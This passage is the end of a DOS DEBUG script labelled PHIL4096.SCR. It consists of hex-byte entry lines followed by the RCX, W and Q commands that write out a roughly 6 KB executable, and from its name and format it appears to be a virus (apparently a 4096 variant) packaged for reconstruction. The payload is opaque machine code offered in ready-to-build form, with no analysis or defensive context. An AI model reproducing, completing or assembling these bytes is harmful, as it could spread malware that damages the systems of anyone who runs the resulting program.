 E 13C0  8D 8B 84 FE C6 7E 8B 0A 95 47 03 8B 89 FE 8B 0C 
 E 13D0  95 8B 8C FE D2 71 A5 F2 8A 36 FE 1F 37 8B BB FE 
 E 13E0  1D 20 46 D0 2F E6 7B 2F C4 7A AE 94 79 3B 86 3B 
 E 13F0  94 62 5A D2 46 EA 3B C1 93 7B 01 C5 7E 8B 0C FF 
 E 1400  3C DF 21 F7 FF 8B BF 01 BD E3 67 1C 7F DD FB 05 
 E 1410  03 21 FF FF 7F 1D 77 18 15 1E 77 18 B6 38 0B F6 
 E 1420  A0 0C 46 F0 DC 3B FD BF 80 FE C6 F4 7E 7F FF 67 
 E 1430  7A B6 8B 55 FE 24 EF FF E1 C9 FC 8B E7 FE 3B 86 
 E 1440  1D 9B B1 8B E7 FE 32 46 CD 3B DD F2 62 44 84 46 
 E 1450  8B BA DD F8 E1 1B 46 79 DE BF AE 94 79 80 FC F8 
 E 1460  8D 46 7F 8B 49 FF 1F A0 8E F6 3B F5 BF 8A DF BF 
 E 1470  FF E2 C5 FE A6 FF A5 E4 8A 06 00 05 0F 05 10 7B 
 E 1480  ED 46 7E 62 FF F7 C6 90 1D 1C 3B E0 F9 F6 BB 7A 
 E 1490  E1 CF F6 A5 D2 8B 93 00 BD 99 37 8B 93 00 A5 60 
 E 14A0  8A 1A 00 C6 20 3B 82 3B EB 8B 98 00 C6 A3 D6 55 
 E 14B0  8A 8A 00 84 20 FD 46 76 2E 8B 92 00 8B AD 00 C6 
 E 14C0  9A D6 8B 19 FF 8B A8 00 B1 54 8B 1B 00 D2 51 8B 
 E 14D0  EA 00 8B 95 80 A0 5A FA FF FC 79 F6 25 FF A5 F8 
 E 14E0  E8 FA 9F C5 40 1A F7 0B 7B 3F 01 CF C4 F2 8B 35 
 E 14F0  16 3B DD FB A2 FF 00 63 F5 C4 00 B6 28 FD 17 8F 
 E 1500  4E 8B 4D 00 67 9B 46 5C 8A 42 80 C6 DD B6 3B 1A 
 E 1510  55 20 71 D4 57 56 67 13 59 DD F3 7F 87 63 D5 FE 
 E 1520  3B E7 C6 72 3B FD 63 1E BD EB 63 20 45 ED 7B 13 
 E 1530  3C F1 6B 1E DF DF 59 C5 18 7F 9B 7F 8B 3B 93 0B 
 E 1540  8C 7B 13 C5 7C 37 2F E6 19 2F CD 7A 67 1C 52 53 
 E 1550  AF 1F 59 C5 89 3F 9C FD 09 1F 57 5F 60 D8 D4 5C 
 E 1560  AD DC 6A D5 DE 60 D4 5F BA 5B D9 5C 57 D5 E8 EA 
 E 1570  96 57 5A 60 D6 D5 5F DB 39 E8 5F D7 57 FF D8 60 
 E 1580  AB 51 E8 51 D8 59 FF 60 B7 D5 5C 6A D4 5C D6 E8 
 E 1590  B4 60 D5 FF 37 A0 A7 F6 5F F7 FF 67 0A 8B FD 00 
 E 15A0  15 1D 77 16 ED 87 D7 D6 14 FF F7 77 16 2F FD F6 
 E 15B0  5A F4 FC F6 BF E1 0C 46 A5 D2 D3 D7 D6 05 05 7F 
 E 15C0  73 2F 3B F8 3B DD 00 3B FA 7E 70 00 2F 37 F8 67 
 E 15D0  ED A3 7F FF 7F 20 2F 0E 1A 0B 46 24 FF FE 05 08 
 E 15E0  19 96 C5 00 DF 3C D5 FE 5A DD FD D2 D3 D7 D6 05 
 E 15F0  7B 6B DD FB D7 7F 1D 2F 59 F8 28 FD BB F8 94 79 
 E 1600  E1 A7 F6 3B DD F7 2F 8E 1A 17 8B 6B 97 D3 7F 9E 
 E 1610  53 DD F8 2F 12 7C 8B 49 96 A2 A7 F6 24 EF FF 8B 
 E 1620  C5 FF 3B DD F5 2F 0E 7C 59 8B 7E F0 FF 2F 37 F8 
 E 1630  59 DD F4 2F 0D 7C 8B 52 00 7F DD FB 05 0D 7F 1E 
 E 1640  55 96 FF 22 FF FF 7B 0A BC 7C 00 E8 37 F8 7F 1E 
 E 1650  55 96 FF 3B 82 54 D2 D7 2B 56 8B 69 FF 8B 55 FE 
 E 1660  0A 32 85 A3 FE 62 0B FB 62 FF FE A2 A7 F6 A5 61 
 E 1670  D0 F8 8B 36 81 1F A5 E0 09 84 A5 D4 0B 86 A2 3D 
 E 1680  97 24 F0 FF A5 DF 0B 8B 1D 1C 3B 18 A3 FF DE 0B 
 E 1690  6F A3 ED 6E 0B 92 67 1C E2 00 5F 0B 17 3B 15 A3 
 E 16A0  96 5F 0B 99 67 1C 3B 18 E2 FE DE 0B 1F A3 FF 55 
 E 16B0  8A 22 01 DF 0B A2 A5 59 09 F6 55 A9 AA FA 9F 46 
 E 16C0  81 51 A2 A7 F6 A5 F2 8B E3 01 A5 D8 A2 F7 F6 24 
 E 16D0  23 FF 8B 33 01 C6 D5 AF 74 F6 ED F3 46 93 D4 55 
 E 16E0  DF 98 F6 3B E0 F9 F6 A9 E9 FA 9F 46 82 51 D0 A2 
 E 16F0  C6 F6 8B 30 01 A5 E1 8B BB 01 37 8B C3 01 A5 60 
 E 1700  8A 4A 01 83 1F 81 3B 86 61 51 E8 24 C2 50 21 F7 
 E 1710  8D 3B 15 A9 E2 1E C6 FC A1 20 45 FE EE 1F AA FA 
 E 1720  F6 46 87 BA DD 03 E2 1D BC FE 04 1F F8 71 3B 5E 
 E 1730  FB E6 8F 46 F9 E5 5A 46 9A 3B 5E 85 62 5F 59 C5 
 E 1740  0A 3A 4A 81 3B 86 21 CF 8D 24 D1 E2 A9 AA FA 9F 
 E 1750  BC 14 E2 20 C5 FD E2 1E 3C 86 3A FD 2F FB F6 37 
 E 1760  58 7E 2F F9 F6 0B 0E B9 74 40 1E B8 FF 56 B8 12 
 E 1770  A7 9C FC F0 7E 1B A0 8D 96 BA F1 BF 07 0C BB F1 
 E 1780  B7 44 84 DC D4 21 C2 F9 59 07 3B 11 24 FD FF 8B 
 E 1790  21 FF 7F 04 5C 8B 66 FF 15 04 5C 8B 69 FF 7F 04 
 E 17A0  8A EA FF 3B 03 3B 06 60 36 6B 08 D8 8B F0 FF 7F 
 E 17B0  02 5C DC 8B 75 FF 7F 04 3A 7F 04 7F 04 DC 8B F9 
 E 17C0  96 83 1F D3 AF 94 79 E1 39 C5 7A 04 1F 55 D4 58 
 E 17D0  7D AC 54 D0 51 C5 89 1F 59 E0 F9 F6 67 9F E9 FE 
 E 17E0  5A 7E 21 CF F6 8B B6 80 BD 67 55 D6 8B A8 80 58 
 E 17F0  8A 2F 80 8B 4A 80 37 A2 3A FA 8B BD 80 8B AD 80 
 E 1800  1D 1C 8B 41 80 8B 2E 80 8A 4B 80 54 8B 3C 80 51 
 E 1810  B1 8B CC 80 80 FC 79 F6 8A 39 03 04 1F 3B 89 1E 
 E 1820  AB FE 8B C9 80 3F 9D F1 8A CD 82 88 29 76 75 12 
 E 1830  0C 75 10 16 35 4F F7 AC 0C 32 8E 81 D3 95 B1 D7 
 E 1840  94 5D E2 F0 75 B0 D7 FD 37 ED 1E B1 D3 79 8F 8C 
 E 1850  34 ED 1E B1 CF 7A 8F 10 2F 32 01 54 40 32 0D 59 
 E 1860  90 15 4F 7B 0C 96 6B F0 C4 7E E0 D7 FD 72 1E CE 
 E 1870  8E 0C 92 35 14 F4 81 74 24 10 81 72 32 11 81 78 
 E 1880  10 1E 4F 76 0C 92 35 80 0F 32 60 73 DD 29 F0 F5 
 E 1890  A4 99 01 70 0A D9 4E A6 B6 2C C9 F6 B0 53 FD B0 
 E 18A0  35 00 A8 E2 75 8D 27 29 8B F5 75 78 74 7E D4 32 
 E 18B0  85 01 FF 0A DB 95 75 A8 C8 F6 ED 8B DD 33 1A AA 
 E 18C0  83 F0 78 ED 99 34 99 17 AE 73 78 5D B0 C3 73 33 
 E 18D0  B2 74 34 1A 2F FF 13 34 EB 59 A1 59 A1 F7 D9 95 
 
 
 RCX
 17E0
 W
 Q
 
 ÄÄ PHIL4096.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
 
 EoF.
